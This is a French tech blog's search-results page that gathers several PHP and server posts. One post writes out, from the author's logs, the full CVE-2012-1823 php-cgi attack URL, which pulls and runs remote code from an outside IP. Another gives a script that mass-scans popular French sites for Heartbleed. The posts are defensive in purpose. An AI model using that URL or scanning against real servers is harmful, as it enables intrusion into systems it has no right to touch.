Recherche

Votre recherche de php a donné 228 résultats.

rebuild nantes

Vous êtes fan des technologies Microsoft ? Faites un tour au ReBUILD le 2 octobre prochain à Nantes.

Le ReBUILD est un salon informatique et communautaire organisé par l'association "Les communautés MS". Ce salon vous propose de rencontrer des experts Microsoft reconnus, de découvrir l’écosystème des partenaires Microsoft et de vous aider à mieux comprendre les produits et les technologies Microsoft pour les intégrer dans vos projets informatiques.

Au programme du ReBUILD 2014 :

  • 1 Conférence plénière​
  • 40 Sessions techniques​
  • 1 concours de développement
  • 15 MVP (Microsoft Most Valuable Profressional) / MSP (Microsoft Student Partner)
  • 38 Speakers
  • 15 Stands partenaires​​

Le programme détaillé des sessions est consultable sur une feuille Excel en ligne, voici la liste synthétique des sujets qui seront abordés lors de cette journée, c'est extrêmement riche :

  • Windows Azure Active Directoy
  • Transformer Excel en solution de BI Libre-service
  • Les fondamentaux de l’architecture SharePoint et ses bonnes pratiques.
  • Innovations autour de Visio 2013
  • Azure et PHP pour vos développements SharePoint 2013/Office 365 : une architecture ouverte et efficace.
  • Développer une Universal App pour Windows Phone 8.1 quand on vient de Silverlight 8.1
  • Intégrer les groupes Yammer et SharePoint pour une meilleure gouvernance
  • Design et expérience utilisateur sous SharePoint 2013
  • De la #ResponsiveOrg aux technologies sociales, l'expérience de travail de demain.
  • De l'usine de développement Visual Studio Online jusqu'à l'hébergement Azure: du Cloud pour plus d'agilité et d'efficacité
  • Windows Azure - Overview
  • Objets connectés: Prenez le contrôle du T1000 avant qu'il ne soit trop tard
  • Designer et animer ses applications Windows Phone avec Blend
  • BYOD : toutes les astuces pour gérer votre parc
  • Créer votre propre scénario de communication avec Lync et Skype
  • Installer Lync en 1 heure avec PowerShell
  • Les nouveautés de Kinect V2
  • Retour d'expérience du Groupe La POSTE - Les outils collaboratifs Microsoft dans le travail de tout les jours
  • Lync comme téléphonie d'entreprise? c'est possible
  • Office 365 et la gestion des identités
  • UX design, comment booster votre taux de conversion
  • Architectures Yammer - Office 365 - SharePoint hybrides oui !Mais pourquoi faire ?
  • SHAREPOINT 2013 : toutes les astuces pour mettre en place un plan de Gouvernance
  • Atelier Tableaux croisés dynamique dans Excel
  • SQL Server 2014: Trois moteurs de stockage pour vos données
  • Xamarin : développement natif unifié Android, iOS, Windows Phone, Windows, Mac, etc
  • Déployer les prérequis Office 365 grâce à Windows InTune
  • Migrer vers Office 365, la ruée vers l'apps
  • Analysez vos usages Yammer, SharePoint et Exchange avec PowerBI
  • Comment réutiliser des composants .NET (Desktop) dans une application Moderne UI et des composants WinRT dans une application Desktop
  • Etes-vous compatible yOS ? Les 5 usages que vous ne pourrez réaliser que sur Office 365 !
  • Mon Windows Phone dans la vie de tous les jours
  • Lync et le monde UC (Universal Communication)
  • Définir une stratégie de migration vers Office 365
  • Coding for Fun - Excel
  • Développer votre activité avec le programme Partenaire Microsoft, le Microsoft Partner Network
  • Tout sur le Social Project Management
  • Implémentation d’un portail citoyen avec Microsoft Dynamics CRM
  • Plongez dans le monde de Visio Services avec Visio 2013

L’événement est totalement gratuit, pour vous inscrire et obtenir un pass, il suffit de vous rendre sur la page Eventbrite de l’événement.

Pour plus d'informations sur cet événement, je vous conseille d'aller faire un petit tour sur la page dédiée à l’événement du ReBUILD.

Inscrivez-vous vite !

lock.jpg

La nouvelle faille SSL Heartbleed (CVE-2014-0160) qui fait trembler Internet depuis ces dernières heures semble toucher de nombreux sites Web sur la toile d'après les premiers articles publiés.

Cette faille peut permettre à un pirate de lire jusqu'à 64Ko de la RAM d'un serveur web distant sans aucune trace d'intrusion. Je vous laisse imaginer les informations auxquelles un attaquant pourrait avoir accès à distance et les conséquences associées.

Pour vérifier l'impact de cette faille sur les 500 plus gros sites Internet français , j'ai développé en quelques lignes un script en PHP qui extrait le top 500 des sites internet français du classement Alexa et qui les audite grâce à l'application Heartbleeder téléchargeable ici.

<?php

for ($i = 0; $i< 19 ;$i++){
$page = file_get_contents("http://www.alexa.com/topsites/countries;".$i."/FR");

preg_match_all('/<a href="\/siteinfo\/[\da-z\.-]+\.[a-z\.]{2,6}">(.*)<\/a>/i', $page, $matches);
foreach ($matches[1] as $match){
        echo "# ".$match;
        $result = exec("./heartbleeder $match");
        if (preg_match('/VULNERABLE/i',$result)){
                echo (' :: VULNERABLE');
        }
        echo "</br>";
}
}

?>

Voici le résultat de l'exécution de mon script cette nuit :

  1. Google.fr :: VULNERABLE
  2. Google.com :: VULNERABLE
  3. Facebook.com
  4. Youtube.com :: VULNERABLE
  5. Wikipedia.org :: VULNERABLE
  6. Yahoo.com :: VULNERABLE
  7. Leboncoin.fr
  8. Orange.fr
  9. Amazon.fr
  10. Live.com
  11. Free.fr
  12. Linkedin.com
  13. Twitter.com
  14. Lemonde.fr
  15. Lefigaro.fr
  16. Adcash.com
  17. Ebay.fr
  18. Tukif.com
  19. Commentcamarche.net
  20. Wordpress.com
  21. Tumblr.com :: VULNERABLE
  22. Allocine.fr
  23. Lequipe.fr
  24. Ad6media.fr
  25. Viadeo.com
  26. Linternaute.com
  27. Pagesjaunes.fr
  28. Sfr.fr
  29. Nouvelobs.com
  30. Akamaihd.net
  31. Jeuxvideo.com
  32. Programme-tv.net
  33. Leparisien.fr
  34. Xhamster.com :: VULNERABLE
  35. Dailymotion.com
  36. Cdiscount.com
  37. Over-blog.com
  38. Pinterest.com :: VULNERABLE
  39. Msn.com
  40. M2newmedia.com
  41. T.co
  42. Ovh.com
  43. 20minutes.fr
  44. Instagram.com :: VULNERABLE
  45. Pole-emploi.fr
  46. Microsoft.com
  47. Bing.com
  48. Lexpress.fr
  49. Priceminister.com
  50. Societe.com
  51. Apple.com
  52. Vube.com
  53. Stackoverflow.com :: VULNERABLE
  54. Paypal.com
  55. Voyages-sncf.com
  56. Journaldunet.com
  57. Xvideos.com
  58. Clkmon.com
  59. Credit-agricole.fr
  60. Livejasmin.com
  61. T411.me
  62. Aufeminin.com
  63. Ovh.net
  64. Fnac.com
  65. Deezer.com
  66. Vente-privee.com
  67. Boursorama.com
  68. Reverso.net
  69. Tf1.fr
  70. Ask.com
  71. Meteofrance.com
  72. Youporn.com
  73. Labanquepostale.fr
  74. Bfmtv.com
  75. Liberation.fr
  76. Laposte.net
  77. Pornhub.com
  78. Lesechos.fr
  79. Wordreference.com
  80. Amazon.com
  81. 01net.com :: VULNERABLE
  82. Outbrain.com :: VULNERABLE
  83. Seloger.com
  84. Lepoint.fr
  85. Adxcore.com :: VULNERABLE
  86. Gameforge.com
  87. Clubic.com
  88. Booking.com
  89. Huffingtonpost.fr
  90. Googleusercontent.com
  91. Doctissimo.fr
  92. Openclassrooms.com :: VULNERABLE
  93. Webrankinfo.com
  94. Dpstream.net :: VULNERABLE
  95. Prestashop.com :: VULNERABLE
  96. Bnpparibas.net
  97. Badoo.com :: VULNERABLE
  98. Vimeo.com
  99. Caisse-epargne.fr
  100. Zone-telechargement.com :: VULNERABLE
  101. Wikimedia.org :: VULNERABLE
  102. Wordpress.org :: VULNERABLE
  103. Canalblog.com
  104. Service-public.fr
  105. Societegenerale.fr
  106. Cpasbien.me :: VULNERABLE
  107. Francetvinfo.fr
  108. Imgur.com
  109. Canalplus.fr
  110. Rueducommerce.fr
  111. Caf.fr
  112. Canadaalltax.com
  113. Flickr.com :: VULNERABLE
  114. Vivastreet.com
  115. Banquepopulaire.fr
  116. Mysearchdial.com :: VULNERABLE
  117. Colissimo.fr
  118. Themeforest.net
  119. Developpez.net
  120. Eurosport.fr
  121. Neobux.com :: VULNERABLE
  122. Voila.fr
  123. Tripadvisor.fr
  124. Conduit.com
  125. Skyrock.com
  126. Redtube.com :: VULNERABLE
  127. Adobe.com
  128. Ouest-france.fr
  129. Aliexpress.com
  130. Leroymerlin.fr
  131. Admngronline.com
  132. Marmiton.org
  133. Yeslibertin.com :: VULNERABLE
  134. Paruvendu.fr
  135. Imdb.com
  136. Meetic.fr
  137. Europe1.fr :: VULNERABLE
  138. Laredoute.fr
  139. Google.co.uk :: VULNERABLE
  140. Ratp.fr
  141. Indeed.fr
  142. Lcl.fr
  143. Bouyguestelecom.fr
  144. Ebay.com
  145. Php.net :: VULNERABLE
  146. Kickass.to :: VULNERABLE
  147. Slideshare.net
  148. Hardware.fr
  149. 1and1.fr
  150. Forgeofempires.com
  151. Fotolia.com
  152. Reddit.com
  153. Thepiratebay.se
  154. Linguee.fr
  155. Xnxx.com
  156. Laposte.fr
  157. Blogspot.com :: VULNERABLE
  158. Potins.net
  159. Goodgamestudios.com
  160. Soundcloud.com
  161. Ikea.com
  162. Scoop.it :: VULNERABLE
  163. Zimbra.free.fr :: VULNERABLE
  164. Rtl.fr
  165. Lesnumeriques.com
  166. Castorama.fr :: VULNERABLE
  167. Ladepeche.fr
  168. Adopteunmec.com :: VULNERABLE
  169. Larousse.fr
  170. Apec.fr
  171. 1fichier.com :: VULNERABLE
  172. Interieur.gouv.fr
  173. Metronews.fr
  174. Journaldesfemmes.com
  175. Atlantico.fr
  176. Sourceforge.net
  177. Mappy.com
  178. Lacentrale.fr
  179. Mes-meilleurs-films.fr
  180. Mozilla.org
  181. Darty.com :: VULNERABLE
  182. Creditmutuel.fr
  183. Thefreecamsecret.com
  184. Amoureux.com
  185. Purepeople.com
  186. E-monsite.com :: VULNERABLE
  187. Deviantart.com
  188. Leguide.com
  189. Uptobox.com :: VULNERABLE
  190. Uploaded.net :: VULNERABLE
  191. Zanox.com
  192. Footmercato.net
  193. Sudouest.fr
  194. France3.fr
  195. Showroomprive.com
  196. Carrefour.fr
  197. Battle.net
  198. Alibaba.com
  199. Koramgame.com
  200. Ldlc.com
  201. Openadserving.com
  202. Semrush.com
  203. Bestusefuldownloads.com
  204. Tradedoubler.com
  205. Koreus.com :: VULNERABLE
  206. Adserverpub.com
  207. Wiktionary.org :: VULNERABLE
  208. Pap.fr
  209. Fdj.fr
  210. Minutebuzz.com
  211. Netvibes.com :: VULNERABLE
  212. Slate.fr :: VULNERABLE
  213. Egaliteetreconciliation.fr :: VULNERABLE
  214. Ameli.fr
  215. Awesomehp.com
  216. Cam4.fr
  217. Latribune.fr
  218. Github.io
  219. Jeanmarcmorandini.com
  220. 9gag.com :: VULNERABLE
  221. Twitch.tv
  222. Papystreaming.com
  223. Bp.blogspot.com
  224. Zalando.fr
  225. Scrutins.net
  226. Portail.free.fr
  227. Alsacreations.com
  228. You-will-date.com
  229. Journaldugeek.com
  230. Dropbox.com :: VULNERABLE
  231. Dl-protect.com :: VULNERABLE
  232. Tomsguide.fr
  233. Wikia.com :: VULNERABLE
  234. Mobile.free.fr
  235. Asos.fr
  236. Github.com :: VULNERABLE
  237. Groupon.fr
  238. Topito.com
  239. Airfrance.fr
  240. Onvasortir.com
  241. Frandroid.com
  242. Imp.free.fr
  243. Spi0n.com :: VULNERABLE
  244. Betclic.fr
  245. Files.wordpress.com
  246. Francetv.fr
  247. Tube8.com
  248. Ad2games.com :: VULNERABLE
  249. Telerama.fr
  250. Lavoixdunord.fr
  251. Frenchweb.fr
  252. Decathlon.fr
  253. Impots.gouv.fr
  254. Torrentz.eu :: VULNERABLE
  255. 3suisses.fr
  256. Voici.fr :: VULNERABLE
  257. Mediapart.fr
  258. Centerblog.net
  259. Materiel.net :: VULNERABLE
  260. Systweak.com
  261. Forumactif.com
  262. Hellocoton.fr
  263. Pcinpact.com
  264. Bbc.com
  265. Comprendrechoisir.com :: VULNERABLE
  266. Korben.info :: VULNERABLE
  267. Cic.fr
  268. Vpsdomain4.eu
  269. Archive.org :: VULNERABLE
  270. Premiere.fr :: VULNERABLE
  271. Themightyquest.com
  272. Zeobit.com :: VULNERABLE
  273. Snapdo.com
  274. Full-stream.net :: VULNERABLE
  275. Bbc.co.uk
  276. Aeriagames.com
  277. Shutterstock.com
  278. Onclickads.net
  279. Wix.com
  280. Legifrance.gouv.fr
  281. Millenium.org :: VULNERABLE
  282. Challenges.fr
  283. Chaturbate.com :: VULNERABLE
  284. Lachainemeteo.com
  285. Netaffiliation.com
  286. Amazonaws.com
  287. Arte.tv
  288. Gandi.net
  289. Logic-immo.com
  290. Wawa-mania.ec
  291. Adsl.free.fr
  292. Softonic.fr
  293. Vk.com
  294. Viamichelin.fr
  295. Jacquieetmicheltv.net
  296. Alittlemarket.com
  297. Trovigo.com
  298. Doublepimp.com
  299. W3schools.com
  300. Paris.fr :: VULNERABLE
  301. Gamekult.com
  302. Auchan.fr
  303. Covoiturage.fr :: VULNERABLE
  304. Boulanger.fr
  305. Forum-auto.com
  306. Mailchimp.com
  307. Iminent.com
  308. Urssaf.fr
  309. Pagesperso-orange.fr
  310. Gentside.com :: VULNERABLE
  311. Wannonce.com :: VULNERABLE
  312. Midilibre.fr
  313. Netechangisme.com
  314. Spartoo.com :: VULNERABLE
  315. Travelagency.travel
  316. Loading-delivery1.com
  317. Monster.fr
  318. Rapidgator.net
  319. Appround.us
  320. Doodle.com :: VULNERABLE
  321. Stackexchange.com :: VULNERABLE
  322. Coqnu.com
  323. Webmaster-rank.info
  324. Purevid.com
  325. Codecanyon.net
  326. Xcams.com
  327. Mediaplex.com
  328. Gameblog.fr
  329. Futura-sciences.com
  330. 6play.fr
  331. Megavod.fr
  332. Amazon.co.uk
  333. Ubuntu-fr.org
  334. Yelp.fr :: VULNERABLE
  335. Xe.com :: VULNERABLE
  336. Dailymail.co.uk
  337. Radins.com :: VULNERABLE
  338. Franceinfo.fr
  339. Bizpowa.com :: VULNERABLE
  340. Skype.com
  341. Kimsufi.com
  342. Letudiant.fr
  343. Feedly.com
  344. Grooveshark.com
  345. Fastdailyfind.com
  346. Aweber.com
  347. Speedanalysis.net
  348. Hootsuite.com
  349. Media.tumblr.com :: VULNERABLE
  350. Youjizz.com
  351. Directrev.com
  352. Domaintools.com
  353. Ask.fm
  354. Easyjet.com
  355. Abritel.fr
  356. Etsy.com
  357. Mmotraffic.com
  358. Pixmania.com
  359. France2.fr
  360. Cdn4711.net :: VULNERABLE
  361. Aol.com
  362. Programme.tv :: VULNERABLE
  363. Maxidivx.com
  364. Ebay.co.uk
  365. Cadremploi.fr
  366. M6.fr
  367. Maville.com
  368. Tuxboard.com
  369. Blogger.com :: VULNERABLE
  370. Theguardian.com
  371. Searchfun.in
  372. Jeu.info
  373. Demotivateur.fr
  374. Startertv.fr
  375. Presse-citron.net
  376. Opodo.co.uk
  377. Sarenza.com
  378. Megacinema.fr
  379. Leagueoflegends.com :: VULNERABLE
  380. Planet.fr
  381. Buzzfeed.com
  382. Wifi.free.fr
  383. Madmoizelle.com
  384. Ledauphine.com
  385. Easyvoyage.com
  386. Hm.com
  387. Wordpress-fr.net
  388. Addthis.com :: VULNERABLE
  389. Babylon.com
  390. Effiliation.com
  391. Google.es :: VULNERABLE
  392. Edreams.fr
  393. Openask.com :: VULNERABLE
  394. Adf.ly :: VULNERABLE
  395. Zdnet.fr
  396. Foozine.com :: VULNERABLE
  397. Delta-search.com
  398. Dealabs.com
  399. Konbini.com
  400. About.com
  401. Elle.fr :: VULNERABLE
  402. Cuisineaz.com
  403. Unblog.fr
  404. Wetransfer.com :: VULNERABLE
  405. Gizmodo.fr
  406. W3.org
  407. Europa.eu
  408. Conforama.fr
  409. Parisexe.com
  410. Downparadise.ws
  411. Routard.com
  412. Femmesdispo.com
  413. Brandalley.fr
  414. Majesticseo.com
  415. 22find.com
  416. Soonnight.com
  417. Beeg.com :: VULNERABLE
  418. Oxatis.com
  419. Mycanal.fr
  420. Macg.co
  421. Numericable.fr
  422. Generation-nt.com
  423. Steampowered.com
  424. Frenchtorrentdb.com
  425. Turbobit.net :: VULNERABLE
  426. Homelidays.com
  427. Dailygeekshow.com
  428. Newhdplugin.net
  429. Lesinrocks.com
  430. Microsoftonline.com
  431. Yac.mx
  432. Sofoot.com
  433. Jeuxonline.info
  434. Ranks.fr :: VULNERABLE
  435. Twenga.fr
  436. Numerama.com
  437. Hardsextube.com
  438. Gtmetrix.com
  439. Insee.fr
  440. Maxifoot.fr
  441. Universfreebox.com
  442. Mondialrelay.fr
  443. Jacquieetmicheltv2.net
  444. Pubeco.fr
  445. Abondance.com
  446. Viedemerde.fr :: VULNERABLE
  447. Sports.fr :: VULNERABLE
  448. Ozap.com
  449. Motherless.com :: VULNERABLE
  450. Ma-reduc.com
  451. Fnacspectacles.com
  452. Jimdo.com
  453. Cloudfront.net
  454. Prizee.com
  455. Caradisiac.com
  456. Westernunion.fr
  457. Bwin.fr
  458. Education.gouv.fr
  459. Pmu.fr
  460. Online.net
  461. Forumconstruire.com
  462. 750g.com
  463. Letribunaldunet.fr
  464. Huffingtonpost.com
  465. Publicidees.com
  466. Vide-greniers.org :: VULNERABLE
  467. Cnn.com
  468. Airbnb.fr :: VULNERABLE
  469. Joomla.fr :: VULNERABLE
  470. Hsbc.fr
  471. Xlovecam.com
  472. Cloudify.cc
  473. Z5x.net
  474. Qadabra.com
  475. Duckduckgo.com :: VULNERABLE

Sur les 500 plus gros sites français 97 sont aujourd'hui vulnérables à cette faille SSL.

nginx.png

Cet article est destiné aux personnes qui rencontrent des difficultés (comme moi) à configurer correctement NGinx pour Dotclear en mode PATH_INFO.

J'ai eu quelques déboires avant de réussir à configurer NGinx pour ce site, voici les astuces de ma configuration que j'ai créée à partir d'informations estampillées sur la toile.

Si vous avez des idées d'amélioration, n'hésitez pas à laisser un commentaire. Je mettrai à jour cet article en fonction des retours reçus.

server {
        listen  80;
        server_name www.geeek.org;
 
        # Si vous n'exploitez pas les access_log, ils ne servent à rien et consomment des IO.
       access_log off;

        index index.php index.html;
        root /var/www/www.geeek.org/public_html/;

        # Seuls Feedburner possède les doit d'accès aux flux RSS du site.
       if ($http_user_agent !~ FeedBurner) {
                rewrite ^/feed/rss2$ http://feeds.feedburner.com/blog-de-geeek last;
                rewrite ^/feed/atom$ http://feeds.feedburner.com/blog-de-geeek last;
        }
 
        # Vous pouvez préciser un deuxième mot de passe si vous êtes parano comme moi.
       location /admin {
                auth_basic "Restricted Access";
                auth_basic_user_file /etc/nginx/htpasswd/default;
                try_files $uri $uri/ /index.php;
        }

        # Bloque l'accès aux fichiers non publiables
       location ~ ^/(db|cache|plugins|inc) {
                deny all;
                return 404;
        }

        # Mécanisme de redirection avec le PATH_INFO
       location / {
                try_files $uri $uri/ @dotclear_path_info;
        }
 
        # Redirection de la requêtes avec les paramètres en PATH_INFO
       location @dotclear_path_info {
                rewrite ^/(.*) /index.php/$1 last;
        }


        # Si script PHP simple
       location ~ \.php$ {
                # With php5-fpm:
               fastcgi_pass unix:/var/run/php5-fpm.sock;
                fastcgi_index index.php;
                include fastcgi_params;
        }

       # Si script PHP en mode PATH_INFO
       location ~ \.php(/.*)$ {
                # With php5-fpm:
               fastcgi_split_path_info  ^(.+\.php)(/.+)$;
                fastcgi_param PATH_INFO   $fastcgi_path_info;
                fastcgi_param PATH_TRANSLATED $document_root$fastcgi_script_name;
                fastcgi_pass unix:/var/run/php5-fpm.sock;
                fastcgi_index index.php;
                include fastcgi_params;
        }
}

dell-r210.jpg

Le blog vient d'être migré vers un nouveau serveur dédié plus performant.

Il vient d'être migré d'une petite DEDIBOX® SC avec un CPU de 1,6 Ghz à un serveur DEDIBOX® CLASSIC + GEN2 équipé d'un processeur 4 coeurs @3.5Ghz et de 8Go de RAM, le tout pour 35,87€ par mois.

La facture de mon hébergement a doublé, cependant cela a permis de donner un bon coup de fouet aux performances des sites qu'il héberge et offre de nouvelles perspectives pour mes nouveaux projets geeks.

Je suis resté sur Ubuntu et j'ai finalement quitté Lighttpd pour Nginx qui est devenu le serveur Web performant de référence sur la toile.
J'ai bien sûr mis en place PHP-FPM et je suis en train de regarder pour mettre en place le plugin NGinx Google Pagespeed pour accélérer la distribution des pages HTML sur les navigateurs récents.

N'hésitez pas à me contacter si vous rencontrez des difficultés d'accès sur le site.

le-meilleur-dev-de-france.jpg

Vous avez prévu quoi le jeudi 10 Octobre ? Le concours du meilleur développeur de France est organisé dans l'école 42 de Xavier Niel.

La compétition consiste en une série de mini épreuves à résoudre (PHP, le C#, ou Java). Celui qui finit en premier et dont le code est vérifié sera déclaré gagnant. Que vous soyez indépendant, encore étudiant, ou au sein d’une grosse entreprise, le concours est ouvert à tous.

L’épreuve se fait de manière individuelle, mais chaque entreprise peut inscrire son équipe de développeurs pour augmenter ses chances de sortir vainqueur de l’épreuve. Avec ou sans diplômes, venez vous confronter aux meilleurs développeurs de France et tentez de remporter la victoire.

10 bonnes raisons de s’inscrire au concours du meilleur DEV de France:

  • Devenir le meilleur développeur de France
  • 10 000 euros cash pour le vainqueur
  • Des dotations exceptionnelles pour les trente premiers au classement
  • Open-bar pour tous les participants
  • Open Bouffe
  • Participation à la « DEV Party », après l’épreuve
  • Echange avec le plus grand nombre de dev jamais réunis en France
  • De nombreux goodies offerts
  • Une rencontre avec les personnalités les plus influentes du monde du digital
  • Lieu unique en son genre, inédit et ultra-moderne : Le temple du Digital

Dépêchez-vous à vous inscrire, les inscriptions s’arrêteront le 30 septembre à minuit.

Pour plus d'informations sur le concours : http://lemeilleurdevdefrance.com

php_logo.jpg

Une importante faille PHP semble occuper de nombreux robots et script kiddies.

Cette faille permet d'exécuter du code PHP à distance et de prendre la main sur un serveur Web très facilement. Voici l'URL que l'attaquant utilise pour détecter si votre serveur est vulnérable :

http://www.monserveur.com/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt

Cette URL est sollicité de nombreuses fois par jour sur mon serveur, je pense que de nombreux serveurs ont été infectés ;-(

En cas de vulnérabilité de votre serveur, l'appel de cette URL permet d'exécuter sur votre serveur du code PHP provenant d'un serveur Thailandais : http://61.19.253.26/echo.txt

<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>

La faille a été découverte mi-mai touche heureusement que les serveurs avec PHP fonctionnant en mode CGI ou l'exécutable PHP est exécuté lors de la requête HTTP. Les serveurs utilisant des pool de CGI PHP de type Fast-cgi ou le mod_php classique d'Apache sont épargnés à ce type d'attaque.

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.

http://www.cvedetails.com/cve/CVE-2012-1823

Je vous invite à vérifier dès maintenant la version de votre installation PHP ;-)

jenkins-php.jpg

Vous souhaitez passer au niveau supérieur d'industrialisation sur vos projets PHP ?

Utilisez Jenkins et passez à Ant pour l'automatisation des tâches et la génération d'indicateurs de qualité de votre code PHP.

Pour cela, un template Jenkins prêt à l'emploi existe sur jenkins-php.org et un exemple de fichier Ant est gracieusement mis à disposition par la communauté sur : http://jenkins-php.org/download/bui....
Il vous suffit de suivre le tutoriel d'installation de Jenkins et de suivre le tutoriel d'ajout de template de projet PHP présenté sur la page d'accueil de jenkins-php.org.

L'ensemble des outils utilisés dans le script Ant peut être récupéré automatiquement via Pear ou Composer.
Si vous décidez d'utiliser Composer, les dépendances comme PhpUnit, PhpPmd peuvent être trouvés et ajoutés comme dépendance au projet facilement via packagist.org que vous devez certainement déjà connaitre.

Une fois le projet configuré dans Jenkins, Jenkins aura en charge du packaging de votre application, de la génération de la documentation, des indicateurs qualité, l'exécution des tests unitaires de non-régression ... Vous n'aurez plus qu'à vous concentrer sur l'essentiel, le développement.

Jenkins-php.png

Les outils industrialisation du mode Java semblent tous avoir été portés pour les projets PHP. C'est une bonne chose pour le développement de PHP dans les entreprises et l'augmentation de la qualité du code des projets PHP produits.

laravel_php.png

Vous êtes développeur PHP et vous trouvez le framework Symfony est trop lourd pour le portail Web que vous souhaitez développer ?
Vous êtes à la recherche d'un framework PHP plus léger mais suffisamment puissant pour gagner en productivité ?

Voici Laravel, certainement le framework PHP qui m'a donné envie de me remettre à utiliser des frameworks PHP pour développer des portails Web.

Laravel a tout d'un grand :

  • Un système de routing simple et efficace.
  • Un ORM puissant et performant : Eloquent.
  • Une organisation du code source simple et facilement compréhensible.
  • Des composants pratiques comme le validateur de formulaire ou bien le mécanisme de pagination proposé.
  • Une intégration avec les styles de Twitter Bootstrap.
  • Un utilitaire "artisan" accessible en ligne de commande permettant de simplifier un certain nombre de tâches.
  • Une intégration naturelle de PHPUnit.

Il est surtout très bien documenté et utilisable très rapidement. La version 4 est cependant compatible seulement avec PHP 5.3.7 et supérieur, il faudra être vigilent si vous souhaitez utiliser Laravel sur un serveur mutualisé hébergeant une version PHP plus ancienne.

Je vous laisse découvrir la puissance du framework Laravel au travers du site Français Laravel.fr qui possède de nombreuses ressources.

Si vous souhaitez découvrir les fonctionnalités en vidéo, je vous invite à jeter un coup d’œil sur la chaîne Youtube de Simpledev.fr qui propose de nombreuses vidéos explicatives sur le framework.

Happy coding !

lock-security.jpg

Par défaut les systèmes de blog possèdent tous un mécanisme d'authentification applicatif permettant de protéger "normalement" toutes les ressources se trouvant dans la zone d'administration du site.

Cependant, il arrive parfois que des failles applicatives soient détectées et permettent à des personnes tierces mal intentionnées de pouvoir exécuter des tâches d'administration sans en avoir les autorisations.

Il y a une astuce très simple qui permet d'augmenter la sécurité d'un blog, cette astuce consiste tout simplement à placer un second mécanisme d'authentification de type Basic HTTP password en entrant sur la zone d'administration.

Ex : http://www.geeek.org/admin/

Cela se fait très simplement sur Apache et sur l'ensemble des autres serveurs Web.
Sur Apache, il suffit de placer un fichier .htaccess dans le répertoire "admin" de votre blog et de définir une politique d'authentification.

AuthType Basic
AuthName "Blog admin"
AuthUserFile /path/to/.htpasswd
Require valid-user

Pour vous aider à générer ce fichier, il existe des outils en ligne.

Après cette petite opération, tous les accès au répertoire d'administration du blog seront filtrés directement par le serveur Web. Les possibles vulnérabilités seront alors hors de portées.
Une autre solution efficace consiste à renommer le répertoire d'administration afin de la rendre non prédictible et limiter les attaques provenant de robots.

Enfin, si vous êtes encore plus paranoïaque que moi, vous pouvez aussi restreindre l'adresse IP ayant accès à la zone d'administration et déporter le contenu du fichier .htaccess directement dans la configuration du serveur Apache si vous en avez les droits.

AuthType Basic
AuthName "Blog admin"
AuthUserFile /path/to/.htpasswd
Require valid-user

Order Deny,Allow
Allow from 11.111.11.111
Deny from all

Satisfy any

Pour terminer, si vous souhaitez bloquer définitivement les tentatives de bruteforce, vous pouvez configurer Fail2ban pour qu'il agisse dynamiquement sur l'IPtables de votre serveur au bout de 5 tentatives d'authentification infructueuses par exemple. Pour cela vous pouvez aller jeter un oeil sur l'article Fail2ban dédié à Apache :

http://www.fail2ban.org/wiki/index.php/Apache

Vous avez désormais tous les outils entre les mains pour surprotéger la zone d'administration de votre blog.
Et vous ? Qu'utilisez-vous pour sécuriser les accès à l'administration votre site Web ?


Crédits photo : Subcircle

twig.jpg

La plupart d'entre vous connaissent et utilisent le PHP comme langage de développement pour leur site Web. Cependant connaissez-vous Twig ?

Twig est un moteur de template performant et très simple d'utilisation permettant de dé-corréler les pages HTML du code PHP.
Il permet de réaliser des applications PHP plus propres, sans devoir utiliser des frameworks lourds comme Symphony ou Zend Framework par exemple.

L'auteur de ce fabuleux outil est ni plus ni moins que Fabien Potencier, le créateur de Symfony framework ;-)

L'usage de Twig est très simple, il suffit de télécharger la librairie, de l'intégrer au sein de son projet PHP et d'initialiser le moteur de template au travers de quelques lignes de PHP :

$loader = new Twig_Loader_Filesystem('/path/to/templates');
$twig = new Twig_Environment($loader, array(
    'cache' => '/path/to/compilation_cache',
));

Le framework a juste besoin d'un répertoire de cache et d'un répertoire contant de pages HTML pour fonctionner.

Une fois le framework initialisé, le rendu d'une page HTML depuis le code PHP est très simple, il suffit de préciser le nom du fichier HTML à interpréter, accompagné de la liste des variables à injecter dans la vue.

echo $twig->render('index.html', array('name' => 'Fabien'));

Au niveau des pages HTML, la lecture des pages est simplifiée, les tags PHP ont disparus et ont été remplacés par des tags simple à retenir et surtout rapide à utiliser.

<h1><?php echo $name?></h1>

L'équivalence Twig :

<h1>{{ name}}</h1>

Enfin, concernant la réutilisation de layout pour permettre un maximum de réutilisation entre les pages HTML est possible.
Il suffit pour cela d'étendre une page via la commande "extends" et de lui injecter des données via la commande "block".

{% extends "layout.html" %}

{% block content %}
    Content of the page...
{% endblock %}

Une extension Twig à PHP a même été réalisée pour bénéficier de performances optimales.

Bref, c'est pratique, simple d'utilisation et vous gagnerez du temps à utiliser ce framework si votre projet contient de nombreuses pages. Je vous conseille donc d'aller y jeter un oeil ! ;-)

http://twig.sensiolabs.org/